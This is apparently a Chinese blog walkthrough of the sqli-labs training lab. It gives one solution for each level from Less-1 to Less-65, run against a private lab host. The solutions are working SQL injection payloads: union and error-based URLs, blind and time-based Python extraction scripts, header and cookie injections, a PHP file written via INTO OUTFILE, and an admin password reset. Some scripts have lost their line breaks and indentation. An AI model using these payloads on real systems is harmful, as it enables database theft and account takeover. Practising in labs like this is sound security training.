sqli-labs通关记录
2024-09-04 02:13:09
环境搭建:https://www.cnblogs.com/kagari/p/11910749.html
总体感受:sqli-labs还是只适合入门
在此基础上添加了一个flag数据库,库名flag,表名flag,字段名flag
Less-1
http://172.16.124.149/Less-1/?id=0%27%20union%20select%201,2,flag%20from%20flag.flag%23
Less-2
http://172.16.124.149/Less-2/?id=0%20union%20select%201,2,flag%20from%20flag.flag
Less-3
http://172.16.124.149/Less-3/?id=0%27)%20union%20select%201,2,flag%20from%20flag.flag%23
Less-4
http://172.16.124.149/Less-4/?id=0%22)%20union%20select%201,2,flag%20from%20flag.flag%23
Less-5
http://172.16.124.149/Less-5/?id=0%27%20union%20select%201,2,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23
Less-6
http://172.16.124.149/Less-6/?id=0%22%20union%20select%201,2,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23
Less-7
secure_file_priv=/var/www/html
/var/www/html root:root 755
/var/www/html/tmp root:root 777
http://172.16.124.149/Less-7/?id=1%27))%20union%20select%201,2,%27%3C?php%20phpinfo();%27%20into%20outfile%20%27/var/www/html/tmp/phpinfo.php%27%23
Less-8
import requests
url='http://172.16.124.149/Less-8/?id='
flag=''
for i in range(1,20):
left=33
right=128 while right-left!=1:
mid=(left+right)/2
payload="0'^(substr((select+binary+flag+from+flag.flag),{i},1)>binary+{mid})%23".format(i=i,mid=hex(mid))
r=requests.get(url=url+payload)
if 'You are in' in r.text:
left=mid
else:
right=mid
flag+=chr(right)
print flag
Less-9
import requests
import time
url='http://172.16.124.149/Less-9/?id='
flag=''
for i in range(1,20):
left=33
right=128 while right-left!=1:
mid=(left+right)/2
payload="0'^(substr((select+binary+flag+from+flag.flag),{i},1)>binary+{mid}+and+sleep(0.02))%23".format(i=i,mid=hex(mid))
t1=time.time()
r=requests.get(url=url+payload)
t2=time.time()
if t2-t1 > 0.2:
left=mid
else:
right=mid
flag+=chr(right)
print flag
Less-10
import requests
import time
url='http://172.16.124.149/Less-10/?id='
flag=''
for i in range(1,20):
left=33
right=128 while right-left!=1:
mid=(left+right)/2
payload='0"^(substr((select+binary+flag+from+flag.flag),{i},1)>binary+{mid}+and+sleep(0.02))%23'.format(i=i,mid=hex(mid))
t1=time.time()
r=requests.get(url=url+payload)
t2=time.time()
if t2-t1 > 0.2:
left=mid
else:
right=mid
flag+=chr(right)
print flag
Less-11
post:
passwd=&uname=' union select 1,(select flag from flag.flag)%23
Less-12
post:
passwd=&uname=") union select 1,(select flag from flag.flag)%23
Less-13
post:
passwd=&uname=') union select%201,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23
Less-14
post:
passwd=&uname=" union select%201,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23
Less-15
import requests
import time
url='http://172.16.124.149/Less-15/'
flag=''
for i in range(1,20):
left=33
right=128 while right-left!=1:
mid=(left+right)/2
payload="'^(substr((select binary flag from flag.flag),{i},1)>binary {mid} and sleep(0.02))#".format(i=i,mid=hex(mid))
data={'passwd':'','uname':payload}
t1=time.time()
r=requests.post(url=url,data=data)
t2=time.time()
if t2-t1 > 0.2:
left=mid
else:
right=mid
flag+=chr(right)
print flag
Less-16
import requests
import time
url='http://172.16.124.149/Less-16/'
flag=''
for i in range(1,20):
left=33
right=128 while right-left!=1:
mid=(left+right)/2
payload='")^(substr((select binary flag from flag.flag),{i},1)>binary {mid} and sleep(0.02))#'.format(i=i,mid=hex(mid))
data={'passwd':'','uname':payload}
t1=time.time()
r=requests.post(url=url,data=data)
t2=time.time()
if t2-t1 > 0.2:
left=mid
else:
right=mid
flag+=chr(right)
print flag
Less-17
post:
passwd='^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2)))#&uname=Dhakkan
Less-18
POST /Less-18/ HTTP/1.1
Host: 172.16.124.149
Content-Length: 22
Cache-Control: max-age=0
Origin: http://172.16.124.149
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: '^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2))),'','')#
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://172.16.124.149/Less-18/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close uname=Dumb&passwd=Dumb
Less-19
POST /Less-19/ HTTP/1.1
Host: 172.16.124.149
Content-Length: 22
Cache-Control: max-age=0
Origin: http://172.16.124.149
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: '^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2))),'')#
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close uname=Dumb&passwd=Dumb
Less-20
GET /Less-20/ HTTP/1.1
Host: 172.16.124.149
Content-Length: 0
Cache-Control: max-age=0
Origin: http://172.16.124.149
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer:
Cookie: uname='^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2)))#
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Less-21
base64编码:')^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2)))#
GET /Less-21/ HTTP/1.1
Host: 172.16.124.149
Content-Length: 0
Cache-Control: max-age=0
Origin: http://172.16.124.149
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer:
Cookie: uname=JyleKHNlbGVjdCBjb3VudCgqKSBmcm9tIG15c3FsLnVzZXIgZ3JvdXAgYnkgY29uY2F0KChzZWxlY3QgZmxhZyBmcm9tIGZsYWcuZmxhZyksZmxvb3IocmFuZCgwKSoyKSkpIw==
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Less-22
base64编码:"^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2)))#
GET /Less-22/ HTTP/1.1
Host: 172.16.124.149
Content-Length: 0
Cache-Control: max-age=0
Origin: http://172.16.124.149
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer:
Cookie: uname=Il4oc2VsZWN0IGNvdW50KCopIGZyb20gbXlzcWwudXNlciBncm91cCBieSBjb25jYXQoKHNlbGVjdCBmbGFnIGZyb20gZmxhZy5mbGFnKSxmbG9vcihyYW5kKDApKjIpKSkj==
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Less-23
http://172.16.124.149/Less-23/?id=0%27%20union%20select%201,2,flag%20from%20flag.flag;%00
Less-24
由于字段长度限制20位,该题只能做到任意用户密码修改
注册:admin'#/123
登陆后修改密码:current_password=123&password=admin&re_password=admin&submit=Reset
admin的密码变为admin
update语句:UPDATE users SET PASSWORD='admin' where username='admin'#' and password='123'
Less-25
http://172.16.124.149/Less-25/?id=%27%20union%20select%201,flag,3%20from%20flag.flag%23
Less-25a
http://1172.16.124.149/Less-25a/?id=0%20union%20select%201,2,flag%20from%20flag.flag
Less-26
http://172.16.124.149/Less-26/?id=%27%a0union%a0select%a01,flag,3%a0from%a0flag.flag;%00
Less-26a
http://127.0.0.1:8080/Less-26a/?id=0%27)union%a0select%a01,2,flag%a0from%a0flag.flag;%00
Less-27
http://172.16.124.149/Less-27/?id=%27%a0uNion%a0sElect%a01,flag,3%a0from%a0flag.flag;%00
Less-27a
http://172.16.124.149/Less-27a/?id=%22%a0uNion%a0sElect%a01,flag,3%a0from%a0flag.flag;%00
Less-28
http://172.16.124.149/Less-28/?id=0%27)%a0uniOn%a0sElect%a01,flag,3%a0from%a0flag.flag;%00
Less-28a
http://172.16.124.149/Less-28a/?id=0%27)%a0uniOn%a0sElect%a01,flag,3%a0from%a0flag.flag;%00
Less-29
http://172.16.124.149/Less-29/?id=%27%20union%20select%201,flag,3%20from%20flag.flag;%00
Less-30
http://172.16.124.149/Less-30/?id=%22%20union%20select%201,flag,3%20from%20flag.flag%23
Less-31
http://172.16.124.149/Less-31/?id=%22)%20%20union%20select%201,flag,3%20from%20flag.flag%23
Less-32
http://172.16.124.149/Less-32/?id=%df%27%20%20union%20select%201,flag,3%20from%20flag.flag%23
Less-33
http://172.16.124.149/Less-33/?id=%df%27%20%20union%20select%201,flag,3%20from%20flag.flag%23
Less-34
post:
passwd=&uname=%df%27%20%20union%20select%20flag,3%20from%20flag.flag%23
Less-35
http://172.16.124.149/Less-35/?id=0%20union%20select%201,flag,3%20from%20flag.flag%23
Less-36
http://172.16.124.149/Less-36/?id=%df%27%20%20union%20select%201,flag,3%20from%20flag.flag%23
Less-37
post:
passwd=&uname=%df%27%20%20union%20select%20flag,3%20from%20flag.flag%23
Less-38
http://172.16.124.149/Less-38/?id=0%27%20union%20select%201,2,flag%20from%20flag.flag%23
Less-39
http://172.16.124.149/Less-39/?id=0%20union%20select%201,2,flag%20from%20flag.flag%23
Less-40
http://172.16.124.149/Less-40/?id=%27)%20union%20select%201,2,flag%20from%20flag.flag%23
Less-41
http://172.16.124.149/Less-41/?id=0%20union%20select%201,2,flag%20from%20flag.flag%23
Less-42
post:
login_password='^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2)))#&login_user=Dhakkan&mysubmit=Login
Less-43
post:
login_password=')^(select count(*) from mysql.user group by concat((select flag from flag.flag),floor(rand(0)*2)))#&login_user=Dhakkan&mysubmit=Login
Less-44
import requests
import time
url='http://172.16.124.149/Less-44/login.php'
flag=''
for i in range(1,20):
left=33
right=128 while right-left!=1:
mid=(left+right)/2
payload="'^(substr((select binary flag from flag.flag),{i},1)>binary {mid} and sleep(0.2))#".format(i=i,mid=hex(mid))
data={'login_password':payload,'login_user':'Dhakkan','mysubmit':'Login'}
t1=time.time()
r=requests.post(url=url,data=data)
t2=time.time()
if t2-t1 > 0.2:
left=mid
else:
right=mid
flag+=chr(right)
print flag
Less-45
import requests
import time
url='http://172.16.124.149/Less-45/login.php'
flag=''
for i in range(1,20):
left=33
right=128 while right-left!=1:
mid=(left+right)/2
payload="')^(substr((select binary flag from flag.flag),{i},1)>binary {mid} and sleep(0.2))#".format(i=i,mid=hex(mid))
data={'login_password':payload,'login_user':'Dhakkan','mysubmit':'Login'}
t1=time.time()
r=requests.post(url=url,data=data)
t2=time.time()
if t2-t1 > 0.2:
left=mid
else:
right=mid
flag+=chr(right)
print flag
Less-46
http://172.16.124.149/Less-46/?sort=1,(1%20regexp%20if((select%20count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))),1,0x00));
Less-47
http://172.16.124.149/Less-47/?sort=%27,(1%20regexp%20if((select%20count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))),1,0x00));%23
Less-48
import requests
import time
url='http://172.16.124.149/Less-48/?sort=1'
flag=''
for i in range(1,20):
left=33
right=128 while right-left!=1:
mid=(left+right)/2
payload="%2C(1+regexp+if((substr((select+binary+flag+from+flag.flag)%2C{i}%2C1)%3Ebinary+{mid})%2C1%2C0x00))%23".format(i=i,mid=hex(mid))
r=requests.get(url=url+payload)
if 'admin' in r.text:
left=mid
else:
right=mid
flag+=chr(right)
print flag
Less-49
import requests
import time
url='http://172.16.124.149/Less-49/?sort=1'
flag=''
for i in range(1,20):
left=33
right=128 while right-left!=1:
mid=(left+right)/2
payload="%27%2C(1+regexp+if((substr((select+binary+flag+from+flag.flag)%2C{i}%2C1)%3Ebinary+{mid})%2C1%2C0x00))%23".format(i=i,mid=hex(mid))
r=requests.get(url=url+payload)
if 'admin' in r.text:
left=mid
else:
right=mid
flag+=chr(right)
print flag
Less-50
http://172.16.124.149/Less-50/?sort=1,(1%20regexp%20if((select%20count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))),1,0x00));
Less-51
http://172.16.124.149/Less-51/?sort=%27,(1%20regexp%20if((select%20count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))),1,0x00));%23
Less-52
import requests
import time
url='http://172.16.124.149/Less-52/?sort=1'
flag=''
for i in range(1,20):
left=33
right=128 while right-left!=1:
mid=(left+right)/2
payload="%2C(1+regexp+if((substr((select+binary+flag+from+flag.flag)%2C{i}%2C1)%3Ebinary+{mid})%2C1%2C0x00))%23".format(i=i,mid=hex(mid))
r=requests.get(url=url+payload)
if 'admin' in r.text:
left=mid
else:
right=mid
flag+=chr(right)
print flag
Less-53
import requests
import time
url='http://172.16.124.149/Less-53/?sort=1'
flag=''
for i in range(1,20):
left=33
right=128 while right-left!=1:
mid=(left+right)/2
payload="%27%2C(1+regexp+if((substr((select+binary+flag+from+flag.flag)%2C{i}%2C1)%3Ebinary+{mid})%2C1%2C0x00))%23".format(i=i,mid=hex(mid))
r=requests.get(url=url+payload)
if 'admin' in r.text:
left=mid
else:
right=mid
flag+=chr(right)
print flag
Less-54
http://172.16.124.149/Less-54/index.php?id=0%27%20union%20select%201,2,flag%20from%20flag.flag%23
Less-55
http://172.16.124.149/Less-55/?id=0)%20union%20select%201,2,flag%20from%20flag.flag%23
Less-56
http://172.16.124.149/Less-56/?id=%27)%20union%20select%201,2,flag%20from%20flag.flag%23
Less-57
http://172.16.124.149/Less-57/?id=%22%20union%20select%201,2,flag%20from%20flag.flag%23
Less-58
http://172.16.124.149/Less-58/index.php?id=0%27%20union%20select%201,2,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23
Less-59
http://172.16.124.149/Less-59/?id=0%20union%20select%201,2,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23
Less-60
http://172.16.124.149/Less-60/?id=%22)%20union%20select%201,2,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23
Less-61
http://172.16.124.149/Less-61/?id=%27))%20union%20select%201,2,count(*)%20from%20mysql.user%20group%20by%20concat((select%20flag%20from%20flag.flag),floor(rand(0)*2))%23
Less-62
import requests
import time
url='http://172.16.124.149/Less-62/?id='
flag=''
for i in range(1,20):
left=33
right=128 while right-left!=1:
mid=(left+right)/2
payload="0%27)^(substr((select+binary+flag+from+flag.flag),{i},1)>binary+{mid})%23".format(i=i,mid=hex(mid))
r=requests.get(url=url+payload)
if 'dhakkan' in r.text:
left=mid
else:
right=mid
flag+=chr(right)
print flag
Less-63
import requests
import time
url='http://172.16.124.149/Less-63/?id='
flag=''
for i in range(1,20):
left=33
right=128 while right-left!=1:
mid=(left+right)/2
payload="0%27^(substr((select+binary+flag+from+flag.flag),{i},1)>binary+{mid})%23".format(i=i,mid=hex(mid))
r=requests.get(url=url+payload)
if 'dhakkan' in r.text:
left=mid
else:
right=mid
flag+=chr(right)
print flag
Less-64
import requests
import time
url='http://172.16.124.149/Less-64/?id='
flag=''
for i in range(1,20):
left=33
right=128 while right-left!=1:
mid=(left+right)/2
payload="0))^(substr((select+binary+flag+from+flag.flag),{i},1)>binary+{mid})%23".format(i=i,mid=hex(mid))
r=requests.get(url=url+payload)
if 'dhakkan' in r.text:
left=mid
else:
right=mid
flag+=chr(right)
print flag
Less-65
import requests
import time
url='http://172.16.124.149/Less-65/?id='
flag=''
for i in range(1,20):
left=33
right=128 while right-left!=1:
mid=(left+right)/2
payload='0")^(substr((select+binary+flag+from+flag.flag),{i},1)>binary+{mid})%23'.format(i=i,mid=hex(mid))
r=requests.get(url=url+payload)
if 'dhakkan' in r.text:
left=mid
else:
right=mid
flag+=chr(right)
print flag
最新文章
- C++ STL简述
- 细说ES7 JavaScript Decorators
- XPath 简介
- [android]亲自破解Flappy Bird(去广告+永生)
- servlet web文件上传
- 【LINUX/UNIX网络编程】之使用SOCKET进行UDP编程
- C#中ArrayList和string,string[]数组的转换
- maven 如何解决因本地jar导致的编译错误
- ArcGIS学习记录—KMZ KML与SHP文件互相转换
- Jmeter:图形界面压力测试工具
- githubRepository -- 使用
- oracle 游标-------转
- 使用 dotnet watch 开发 ASP.NET Core 应用程序
- ArcGIS 网络分析[2] 在ArcMap中使用网络数据集进行五大网络分析[最短路径/服务区/最近设施点/OD成本矩阵/车辆分配]
- Selenium+PhantomJS实现简易有道翻译爬虫
- ActiveMQ学习系列(二)----生产者客户端(java)
- 一个Silverlight工程的各文件解析
- freeswitch 获取app和api帮助
- Windows10 IME占用过高临时解决办法
- Metasploit域渗透测试全程实录(终结篇)
热门文章
- Apache ---- Solrl漏洞复现
- 三、eureka服务端获取服务列表
- 安装window、linux双系统
- SAP官方发布的ABAP编程规范
- 3.Redis数据类型
- 面对runc逃逸漏洞,华为云容器为您保驾护航
- PAT Basic 1088 三人行 (20 分)
- Paper Reading:word2vec Parameter Learning Explained
- ZZNUOJ-2155-单身man集合-【标程做法:数位DP-1-10^8,提前暴力打表法: 砍时间复杂度到10^5】
- php文件更新后不生效?亲测有效!